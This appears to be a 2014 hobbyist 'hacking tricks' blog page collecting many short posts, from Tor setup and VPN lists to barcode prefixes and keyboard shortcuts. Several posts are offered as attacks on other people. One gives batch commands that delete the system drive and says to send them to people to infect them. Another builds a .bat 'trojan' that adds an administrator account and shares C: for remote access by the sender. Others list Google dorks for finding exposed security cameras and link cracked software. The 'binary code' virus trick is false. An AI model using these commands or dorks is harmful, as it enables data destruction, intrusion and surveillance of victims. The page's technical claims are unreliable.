Saturday, 26 April 2014

WATCH ANY TV SHOW ONLINE FOR FREE.

WATCH ANY TV SHOW ONLINE FOR FREE. 

I am big fan of the TV-Shows but sadly my cable operator dont give the channels so i googled my problem and found a perfect solution. You can watch any TV-SHOW online for free not only new episodes but all the episodes of all the Seasons.

The GREAT SITE IS :> LINK



You can visit this site and the following page will welcome you, you go to the "Series" and it will show you the list of all of the shows. You can navigate to the show you wants to watch and click on it. It will them show all the episodes and seasons as shown below (Big Bang Theories):



Now you select the episode and goto the a third party site thats hosts the episode . ALL FOR FREE! you can even download the episode by the instructions give HERE
Read more »

INSTALLATION OF TOR WITH VIDEO ON WINDOWS 7

INSTALLATION OF TOR WITH VIDEO ON WINDOWS 7

The Vidalia Bundle for Windows contains Tor, Vidalia (a GUI for Tor), Torbutton (a plugin for Mozilla Firefox), and Polipo (a web proxy) packaged into one bundle, with the four applications pre-configured to work together. Download either the stable or the experimental version of the Vidalia Bundle.
tor installer splash page
If you have previously installed Tor, Vidalia, or Polipo you can deselect whichever components you do not need to install in the dialog shown below.
select components to install
After you have completed the installer, the components you selected will automatically be started for you.
Tor comes configured as a client by default. It uses a built-in default configuration file, and most people won't need to change any of the settings. Tor is now installed.
After installing Tor and Polipo, you need to configure your applications to use them. The first step is to set up web browsing.
You should use Tor with Firefox and Torbutton, for best safety. The bundle installs the Torbutton plugin for you. Restart your Firefox, and you're all set:
Torbutton plugin for Firefox 
If you plan to run Firefox on a different computer than Tor, see the FAQ entry for running Tor on a different computer.
To Torify other applications that support HTTP proxies, just point them at Polipo (that is, localhost port 8118). To use SOCKS directly (for instant messaging, Jabber, IRC, etc), you can point your application directly at Tor (localhost port 9050), but see this FAQ entry for why this may be dangerous. For applications that support neither SOCKS nor HTTP, take a look at SocksCap or FreeCap. (FreeCap is free software; SocksCap is proprietary.)
Check to see that Vidalia is running. Vidalia uses a small green onion to indicate Tor is running or a dark onion with a red "X" when Tor is not running. You can start or stop Tor by right-clicking on Vidalia's icon in your system tray and selecting "Start" or "Stop" from the menu as shown below:
Vidalia Tray Icon
Next, you should try using your browser with Tor and make sure that your IP address is being anonymized. Click on the Tor detector and see whether it thinks you're using Tor or not. 
If you have a personal firewall that limits your computer's ability to connect to itself, be sure to allow connections from your local applications to local port 8118 and port 9050. If your firewall blocks outgoing connections, punch a hole so it can connect to at least TCP ports 80 and 443.


Read more »

DEADLY VIRUSES!!!!!

DEADLY VIRUSES!!!!!


If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1. Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2. Save As An EXE Any Name Will Do

Step 3. Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code. Save As An EXE Any Name Will Do

format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001

Try to figure out yourself rest
can’t spoonfeed
Its working.

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this:
go to notepad and type the following:
@Echo off
Del C:\ *.*|y  save it as Dell.bat
want worse then type the following:


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Read more »

FINDING ANY PRODUTS ORIGIN FROM BAR CODE.

FINDING ANY PRODUTS ORIGIN FROM BAR CODE.

Here is a short but great Tutorial on how to find a products origin (country where it was made) from its bar code. For those of you who dont know what bar code is, It is actually lines and numbers written underneath on any products back like one below:[Image: main.php?g2_view=core.DownloadItem&a...alNumber=3]
The Trick is actually reading the first three numbers, in this case "478". After you have got the first three numbers match it with table below to find its origin. In this case the product was from "Uzbekistan"

TABLE:
 ====================================================
 ASSIGNED GS1 PREFIXES
000 - 019     GS1 US
020 - 029     Restricted distribution (MO defined)
030 - 039     GS1 US
040 - 049     Restricted distribution (MO defined)
050 - 059     Coupons
060 - 139     GS1 US
200 - 299     Restricted distribution (MO defined)
300 - 379     GS1 France
380     GS1 Bulgaria
383     GS1 Slovenija
385     GS1 Croatia
387     GS1 BIH (Bosnia-Herzegovina)
389     GS1 Montenegro
400 - 440     GS1 Germany
450 - 459 & 490 - 499     GS1 Japan
460 - 469     GS1 Russia
470     GS1 Kyrgyzstan
471     GS1 Taiwan
474     GS1 Estonia
475     GS1 Latvia
476     GS1 Azerbaijan
477     GS1 Lithuania
478     GS1 Uzbekistan
479     GS1 Sri Lanka
480     GS1 Philippines
481     GS1 Belarus
482     GS1 Ukraine
484     GS1 Moldova
485     GS1 Armenia
486     GS1 Georgia
487     GS1 Kazakstan
488     GS1 Tajikistan
489     GS1 Hong Kong
500 - 509     GS1 UK
520     GS1 Global Office
521     Global Office (Greece)
528     GS1 Lebanon
529     GS1 Cyprus
530     GS1 Albania
531     GS1 MAC (FYR Macedonia)
535     GS1 Malta
539     GS1 Ireland
540 - 549     GS1 Belgium & Luxembourg
560     GS1 Portugal
569     GS1 Iceland
570 - 579     GS1 Denmark
590     GS1 Poland
594     GS1 Romania
599     GS1 Hungary
600 - 601     GS1 South Africa
603     GS1 Ghana
604     GS1 Senegal
608     GS1 Bahrain
609     GS1 Mauritius
611     GS1 Morocco
613     GS1 Algeria
615     GS1 Nigeria
616     GS1 Kenya
618     GS1 Ivory Coast
619     GS1 Tunisia
621     GS1 Syria
622     GS1 Egypt
624     GS1 Libya
625     GS1 Jordan
626     GS1 Iran
627     GS1 Kuwait
628     GS1 Saudi Arabia
629     GS1 Emirates
640 - 649     GS1 Finland
690 - 695     GS1 China
700 - 709     GS1 Norway
729     GS1 Israel
730 - 739     GS1 Sweden
740     GS1 Guatemala
741     GS1 El Salvador
742     GS1 Honduras
743     GS1 Nicaragua
744     GS1 Costa Rica
745     GS1 Panama
746     GS1 Republica Dominicana
750     GS1 Mexico
754 - 755     GS1 Canada
759     GS1 Venezuela
760 - 769     GS1 Schweiz, Suisse, Svizzera
770 - 771     GS1 Colombia
773     GS1 Uruguay
775     GS1 Peru
777     GS1 Bolivia
779     GS1 Argentina
780     GS1 Chile
784     GS1 Paraguay
786     GS1 Ecuador
789 - 790     GS1 Brasil
800 - 839     GS1 Italy
840 - 849     GS1 Spain
850     GS1 Cuba
858     GS1 Slovakia
859     GS1 Czech
860      GS1 Serbia
865     GS1 Mongolia
867     GS1 North Korea
868 - 869     GS1 Turkey
870 - 879     GS1 Netherlands
880     GS1 South Korea
884     GS1 Cambodia
885     GS1 Thailand
888     GS1 Singapore
890     GS1 India
893     GS1 Vietnam
896     GS1 Pakistan
899     GS1 Indonesia
900 - 919     GS1 Austria
930 - 939     GS1 Australia
940 - 949     GS1 New Zealand
950     GS1 Global Office
951     GS1 Global Office (EPCglobal)
955     GS1 Malaysia
958     GS1 Macau
960-969     Global Office (GTIN-8s)
977     Serial publications (ISSN)
978 - 979     Bookland (ISBN)
980     Refund receipts
981 - 983     Common Currency Coupons
990 - 999     Coupons
Note: From the 960 prefix range, 9600 to 9604 have been assigned to GS1 UK for GTIN-8 allocations. Prefixes not listed above are used by GS1 Global Office for number allocations in non-member countries and reserved for future use.
===============================================================
Read more »

HOW TO: VIEW HIDDEN FORUMS AND WEBSITES THAT ASK FOR REGISTRATION.

HOW TO: VIEW HIDDEN FORUMS AND WEBSITES THAT ASK FOR REGISTRATION.



As an internet user every day while surfing the internet we find many sites in Google that ask for registration or credit card information. In this case one thing is certain , that what Google view is different from what we view. Here is one simple solution by which you could fool the site to think that you are Google Bot. (Google Bot is the software with which Google Crawl all the Stuff on internet).

All you have to do is Paste the following code into Notepad and save it as useragent.reg so that it will modify the registry.
  CODE IS:

[HKEY_LOCAL_MACHINE\SOFTWARE\Micro$oft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]@=”Googlebot/2.1″”Compatible”=”+http://www.googlebot.com/bot.html”


And for the Default settings paste the following code into Notepad and save it as defuseragent.reg

CODE IS:

[HKEY_LOCAL_MACHINE\SOFTWARE\Micro$oft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]@=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

Now all you have to do is to execute the useragent.reg when you want to open those sites and when it is done open defuseragent.reg and every thing will be same.!


Read more »

A HUGE LIST OF VPN DOWNLOADS & PROXY SERVERS

A HUGE LIST OF VPN DOWNLOADS & PROXY SERVERS

What is a VPN?
VPN stands for virtual private network. A VPN keeps your wireless communications safe by creating a secure "tunnel," though which your encrypted data travels. These tunnels cannot be entered by data that is not properly encrypted. Not only is data encrypted when you use a VPN, but the originating and receiving network addresses are also encrypted. This adds an extra layer of security.

What is a proxy?
Proxy sites enable you to bypass your own Internet provider and browse through the proxy web site. All that you have to do is type the web site address you would like to visit in the form they provide, and start browsing. Once you keep browsing using that form, you are protected and your real IP address is not being logged.

VPN downloads!

1) UltraVPN
UltraVPN is a free VPN that hides your connection from unwanted ears and allows you to use blocked application. Traffic is quota is unlimited. Bandwidth is up to 500Ko/s depending on network conditions.

[Image: UltraVPN_1.png]

Click here to download UltraVPN!
Click here to use UltraVPN with Linux!

2) Loki VPN 
Loki Network allows you to surf the Internet anonymously and hides your real location (IP address). Everything you do through the Loki Network is done from the name of the Loki Network server and from its IP address. Connection between your computer and Loki Network is secured with SSL.

However, to protect your anonymity you still have to be careful about any data you fill in Web forms and network applications you use locally (any locally running application still have the complete access to your real IP address).

[Image: 1152311F9-0.png]

Click here to download Loki VPN!

3) Tor
An anonymous Internet communication system, Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize Web browsing and publishing, instant messaging, IRC, and SSH. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.

[Image: 2dkl2fl.jpg]

Click here to download Tor!

4) Cyberghost VPN
The Internet has long since become an interactive means of communication. Everyone writes e-mails, and many are making use of online storage sites, blogging, or sharing their views on Web forums. Fortunately, CyberGhost VPN gives users a way to surf anonymously and keep their private information from the eyes of others. CyberGhost VPN provides you with anonymous IP address and encrypts transmissions between you and the Web.

[Image: scr-simontools-cyberghost-vpn.jpg]

Click here to download CyberGhost VPN!

5) JAP
JAP Anon Proxy provides the functionality to surf the web without being observed. This means that neither the requested server nor any observer on the Internet can know which user has viewed which web page - in short, anonymity.

[Image: JonDoScreenshot_en01.png]

Click here to download JAP!

6) FreeProxy
FreeProxy enables many users to share an Internet connection. The basic features include proxying HTTP, SMTP, POP, FTP Proxy, TCP Tunneling, and SOCKS 4/4a/5. The application works well with a wide range of clients including browsers, ICQ, and MSN messenger and comprehensive help illustrates the setup of these clients. In addition, FreeProxy includes authentication to both an internal user database or to a windows domain, extensive reporting, comprehensive control of resource permissions, URL filtering, IP address filtering, local port binding, demand dialing, calendar control, proxy chaining, and includes a functional Web server, plus numerous other features.

[Image: freeproxy_scr.png]

Click here to download FreeProxy!

7) AnalogX Proxy
AnalogX Proxy supports FTP (file transfer), HTTP (web), HTTPS (secure web), NNTP (newsgroups), POP3 (recieve mail), SMTP (send mail) and Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer, Netscape, Instant Messenger.

[Image: Proxy_1.png]

Click here to download AnalogX Proxy!

8) Hotspot Shield 
Hotspot Shield is a freeware which ensures anonymous and censor-free internet usage. With Hotspot Shield you can even access blocked websites. For example: Skype is blocked in certain parts of the world. With Hotspot Shield, anyone can access Skype (and any other site they choose). The free software ensures censor-free internet usage by encrypting all communications to and from your computer to protect you from online spying. While advertising supported, HotSpot Shield is is not an invasive adware or pervasive spyware application.

[Image: hotspot-shield-connected1.png]

Click here to download Hotspot Shield!

9) TheGreenBow VPN Client
TheGreenBow VPN Client is a standard-based IPSec VPN Client, compliant with most of the popular VPN gateways allowing fast integration in existing networks. Highly efficient and extremely easy to configure, it provides the remote users an IPSec VPN Client to securely connect to the corporate network. It also allows peer-to-peer VPN with full IPSec standards, full IKE NAT Traversal, IP address emulation, strong encryption (X509, AES, MD5, DES, DH group 1 to 5), Strong authentication (Certificates, X-Auth, Pre-shared key, USB token), redundant gateway and DPD detection, high performances, no system overhead, DNS and WINS resolutions supported, operates as a Service, allowing the use on unattended Servers, accepts incoming IPsec Tunnels, optional 'IPsec only' traffic filtering. Wireless connectivity (GPRS, WiFi, Bluetooth).

[Image: TheGreenBow-IPSec-VPN-Client_3.png]

Click here to download TheGreenBow VPN Client!
*Download link untested, please scan any crack/keygen before use

10) ProxyWay
ProxyWay is free proxy tool that provides easy way to scan proxy lists, check proxy, filter and change proxy servers on fly. You can use ProxyWay with browsers and different applications to visit different sites, download movies, files, send messages, etc.
To simlify ProxyWay configuration you can use 'ProxyWay Auto Configuration' option. Using this option you don't need to download proxy lists, check proxies, create services and configure browser settings manually. ProxyWay will do it for you. The only one thing you should do is start surfing.

ProxyWay main features:
● Easy setup - Proxy Way 'Auto Configuration' option automatically updates proxy list, checks proxies, creates services and configures your browser
● Hide Your Real IP
● Proxy Finder
● Proxy Checker
● Proxy Management System - creates proxy chains and easily changes them on fly
● Supports web proxies

[Image: proxy_list.gif]

Click here to download ProxyWay!

11) InterWAP
Free SSH and VPN FULL SPEED UNLIMITED tunnel anonymizer. Bypass provider restrictions and surf anonymous. Use any services, games and applications even if your provider blocks the access. The speed is not affected.

[Image: 8233c765622b0a0f8beb404d7e968c09b247_1PrintScreen2.JPG]

Click here to download InterWAP!

12) Free VPN
Free VPN protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Free VPN protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Free VPN also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with FreeVPN. We love the web because of the Freedom that it creates to explore, organize, and communicate. Free VPN enables access to all information online, providing freedom to access all web content freely and securely. Secure your entire web session and ensure your privacy online; your passwords, credit card numbers, and all of your data is secured with Free VPN.

[Image: usa-uk-and-canada-vpn-client.jpg]

Click here to download Free VPN!

13) Barracuda Proxy
BdProxy - SOCKS, HTTP, and HTTPS Proxy Server. The BdProxy acts as a SOCKS, HTTP, and HTTPS proxy server. The proxy allows you to use your Internet applications anonymously, despite firewalls. The BdProxy is a free and complementary BarracudaDrive product. The BdProxy client connects and establishs a secure tunnel to the HTTPS Tunnel server integrated into the BarracudaDrive Web Server. This product requires the BarracudaDrive server.

[Image: BdProxy.png]

Click here to download Barracuda Proxy!

14) ProxyMaster
ProxyMaster is an Internet utility to let you browse the Web anonymously by hiding your IP address.
When you surf the Internet your unique identification number (IP number) can be detected by any Website you visit.
ProxyMaster lets you use another IP number which is provided by a server called anonymous proxy server as a unique.

- Hide your IP number from people.
- Check the availability of multiple anonymous proxy servers with a blazing fast speed.
- Import any list of anonymous proxy servers into Winnow Anonymous Proxy
- Export the list of anonymous proxy servers contained in Winnow Anonymous Proxy to text file
- ProxyMaster automatically deletes dead anonymous proxy servers.



Click here to download ProxyMaster!

Proxy Sites
Use these for quick access to websites your workplace/college/school has blocked.

Bypasshack
OnlineEducationz
Pagewash
Surfproxy
Passall



Keep checking back, it's regularly updated!
Enjoy anonymous surfing!

by iBruteforce
 source:
http://hackforums.net/showthread.php?tid=74534
Read more »

HOW TO MAKE A FAKE VIRUS IN 1 MINUTE

HOW TO MAKE A FAKE VIRUS IN 1 MINUTE

1: Right-Click on Desktop and choose new and then shortcut.

2: Type in it shutdown -s -t 10 -c "Warning!!! Your Computer is Invaded and it will format for ever.” 

3: Now complete the Shortcut and Customize it’s Icon by right clicking it , than choosing My computer logo for it.

4: Now rename it as My computer and replace it with My computer on Desktop.

5: Enjoy watching your friend dead with fear!! Hahaha.

How does it Work?

There is nothing to be scared of from it because it only shutdown the computer and have n effect on system
Read more »

LET’S MAKE A TROJAN WITH .BAT FILE

LET’S MAKE A TROJAN WITH .BAT FILE


Open a dos prompt we will only need a dos prompt , and windows xp…

-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

———————- Starting ——————-
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
Read more »

Internet Download Manager [IDM] v6.19 Build 2 + Cracked-RCE

Internet Download Manager [IDM] v6.19 Build 2 + Cracked-RCE


Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.

Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Other features include multilingual support, zip preview, download categories, scheduler pro, sounds on different events, HTTPS support, queue processor, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), built-in download accelerator, and many others.

Version 6.15 adds Windows 8 compatibility, adds IDM download panel for web-players that can be used to download flash videos from sites like YouTube, MySpaceTV, and Google Videos. It also features complete Windows 7 and Vista support, YouTube grabber, redeveloped scheduler, and MMS protocol support. The new version also adds improved integration for IE 10 and IE based browsers, redesigned and enhanced download engine, the unique advanced integration into all latest browsers, improved toolbar, and a wealth of other improvements and new features.

Main Features:
• Internet Download Manager supports all popular browsers including IE, AOL, MSN, Opera, Firefox, Avant Browser, and it can be integrated into any Internet application to take over downloads using unique “Advanced Browser Integration” feature.
• Dynamic Segmentation and Performance.
• Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.
• Download Speed Acceleration. IDM can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology.
• Download Resume. IDM will resume unfinished download from the place where they left off.
• YouTube grabber. IDM can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.
• Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.
• Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
• Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application.
• Built-in Scheduler. IDM can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it’s done.
• IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It’s possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.
• IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.
• IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.
• Download All feature. IDM can add all downloads linked to the current page. It’s easy to download multiple files with this feature.
• Download Categories. IDM can be used to organize downloads automatically using defined download categories.
• Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
• IDM is multilingual.


What's new in version 6.19 build 2
(Released: Feb 21, 2014)
• Added support for Google Chrome 33
• Fixed bugs
DOWNLOAD:
Read more »

3 PROXY SITE TO HIDE YOUR IDENTITY.

3 PROXY SITE TO HIDE YOUR IDENTITY.


  1. LINK
  2. LINK
  3. LINK
Read more »

FACEBOOK STATUS PRANK! [STATUS UPDATE VIA IPHONE5]

FACEBOOK STATUS PRANK! [STATUS UPDATE VIA IPHONE5]

This Article is for those who want to impress their friends by Updating their status by iPhone5 


LIKE THIS

HOW TO DO THIS!?

Read more »

GOOGLE DORKS FOR HACKING SECURITY CAMERAS!

GOOGLE DORKS FOR HACKING SECURITY CAMERAS!




In my previous article about Hacking Security Cameras I described the way how to find the Vuln Sec Cams.Here Is the Article. Now in this article I am giving you list of dorks which could be used to find these Cameras.

So Here you go:


* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”
Read more »

SHARECASH DIRECT DOWNLOAD.

SHARECASH DIRECT DOWNLOAD.

How to use it:

This is coded in VB.NET so it requires .NET Framework to run. It also requires Internet Explorer installed.

First, open the $harecash Downloader and then type the mirror link in the textbox.

Then press "Navigate" and wait for 10-15 seconds.

Then press "Download" and your file should be download.

Screenshot:


Download link:

Read more »

WINDOWS SHORTCUTS

WINDOWS SHORTCUTS

Here are some windoes shortcut keys
Windows Shortcuts keys
Alt + E — Opens the Edit menu
Alt + Enter — Opens the Properties window
Alt + F — Opens the File menu
Alt + F4 — Closes the current program
Alt + Print — Screen Takes a screen shot of the current window or program
Alt + Tab — Switches between the programs currently in use
CTRL+TAB — SWITCHES BETWEEN TAB IN DIALOG BOX,I.E 7
Ctrl + A — Selects all text
Ctrl + C — Copies the selected object
Ctrl + End — Jumps to the end of the current document
Ctrl + Esc — Opens the Start menu
Ctrl + F4 — Closes the current program
Ctrl + Home — Jumps to the beginning of the current document
Ctrl + Insert — Copies the selected object

Ctrl + left arrow — Moves to the left one word
Ctrl + right arrow — Moves to the right one word
Ctrl + V — Pastes the selected object
Ctrl + X — Cuts the selected object
Ctrl + the “+”key — Perfectly resizes the width of Explorer columns
End — Jumps to the end of the current line
F1 — Opens the Help menu
F2 — Renames the selected icon
F3 — Launches the Search Companion in a folder or on the
desktop

F4 — Accesses the Address Bar in a folder or window
F5 — Refreshes the contents of a folder or window
Home — Jumps to the beginning of the current line
Shift + Delete — Permanently deletes files (bypasses the Recycle Bin)
Shift + End — Highlights text from the current position to the end of
the line
Shift + F10 — Substitutes for a right-click
Shift + Home — Highlights text from the current position to the
beginning of the line
Shift + Insert — Pastes the selected object
Shift while inserting — Prevents the CD player from playing an audio CD

Shortcuts for Keyboards with a “Windows”Key (Resembling a Flag)

Windows Key + E — Opens Windows Explorer
Windows Key + F — Launches the Windows Search Companion
Windows Key + F1 — Opens the Help and Support Center
Windows Key + L — Locks down Windows
Windows Key + M — Minimizes all windows and shows the desktop
Windows Key + M + Shift — Undoes the minimize
Windows Key + Opens — the System Properties window
Pause/Break key
Windows Key + R — Opens the Run window
Windows Key + U — Launches the Utility Manager
WINDOWS KEY+U — MINIMIZES ALL WINDOWS AND GOES TO DESKTOP
Read more »

HACKERS THE REAL LIFE VAMPIRES!

HACKERS THE REAL LIFE VAMPIRES!




Well here is a article that I wanted to write from July, finally I am DOING IT! 
Well if you are reading this article then you must be a Hacker or a Vampire-Lover or both like me (though I hate Ian Somerhalder for some PERSONAL reasons). As even a third grader would know that Vampires does not exist apart form myths! So if someone is obsessed with Vampires which is the best possible alternative to look at in real life?

My Answer would be "Hackers". But why?

This is a small argument. I have some comparisons between both and then you people can decide for yourself!

1: Speed
Well here take speed as merely speed, in vampires case it is running speed. Like they run at super human speed and can outrun any car( So I wonder which Edward Cullen had a whole collection of it). In Hackers case the typing speed is superhuman, no body can type faster then them.

2: Image
The one is the most likely thing. See in Vampires case there are Good Vampires and Bad Vampires and same is the case with Hackers, there are Good Hacker and there are Bad Hackers. Bad Vampires hunt humans and Good one just harm the innocent cows, here Bad Hackers hurt the innocent users by hacking there accounts or just Hack a Website for fun on the other hand good ones do not hack any one like that they just experiment with there own computers.

3: Tracking Ability
If you Google for the abilities of the Vampires one of the most common is to track people. They can track any Human with their scent and hunt them down. Same is the case with Hackers they can hunt nearly everyone through the abilities. An interesting example is of Kevin Mitnick who was most wanted person on FBI list but they could not catch him for many years finally another Hacker named Tsutomu Shimomura hunt him down and that resulted in Kevin's arrest!

4: Night
Both of these teams work at night for them Day is the resting time and useless on the other hand the night is for the work and live. Vampires would be killed by the sunlight (do not believe Twilight, the sparkling stuff does not comply with the legends) and Hackers are also in action in Night.

So this is my small argument that Hackers are the real life Vampires, they also comply with the Vampire culture of the small families and groups. They are more in common then in difference. So According to me Being a Hackers is just being a Vampire. This article is also a message for Vampire loving Girls. Look Gals Vampires are not going to come so there are my Hacker brothers out there too, please consider them! lolx ;)
Read more »

SNIFFERS - TOOL AND SOFTWARES: NETWORK SNIFFERS

SNIFFERS - TOOL AND SOFTWARES: NETWORK SNIFFERS



Tool: Windump

  • WinDump is the porting to the Windows platform of tcpdump, the most used network sniffer/analyzer for UNIX.

WinDump is the porting to the Windows platform of tcpdump, the most prolific network sniffer/analyzer for UNIX. Porting is currently based on version 3.5.2. WinDump is fully compatible with tcpdump and can be used to watch and diagnose network traffic according to various complex rules.

WinDump is simple to use and works at the command prompt level. The syntax that we have used as seen in our screenshot here, is Windump -n -S -vv. The -n option tells Windump to display IP addresses instead of the computers' names. The -S option indicates that the actual TCP/IP sequence numbers should be shown. If this option is omitted, relative numbers will be shown. The -vv options make the output more verbose, adding fields such as time to live and IP ID number to the sniffed information.
Let's take a closer look at how WinDump records various types of packets. Here's a TCP example, which shows a data packet with the PUSH and ACK flags set. First, we have the WinDump log entry for the packet. Immediately after it is the same entry, but with an explanation added for each field:
20:50:00.037087 IP (tos 0x0, ttl 128, id 2572, len 46) 192.168.2.24.1036 > 64.12.24.42.5190: P [tcp sum ok] 157351:157357(6) ack 2475757024 win 8767 (DF)
The above entry can be deciphered as 20:50:00.037087 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 2572, len 46) 192.168.2.24.1036 [source IP:port] > 64.12.24.42.5190: [destination IP:port] P [push flag] [tcp sum ok] 157351:157357 [sequence numbers] (6) [bytes of data] ack 2475757024 [acknowledgement and sequence number] win 8767 [window size] (DF) [don't fragment set]
The next example is UDP.
20:50:11.190427 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 6071, len 160) 192.168.2.28.3010 [source IP:port] > 192.168.2.1.1900: [destination IP:port] udp [protocol] 132
ICMP log entry looks as given below.
20:50:11.968384 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 8964, len 60) 192.168.2.132 [source IP] > 192.168.2.1: [destination IP] icmp [protocol type] 40: [Time to live] echo request seq 43783 [sequence number]
Finally, WinDump will also capture ARP requests and replies.
20:50:37.333222 [timestamp] arp [protocol] who-has 192.168.2.1 [destination IP] tell 192.168.2.118 [source IP]
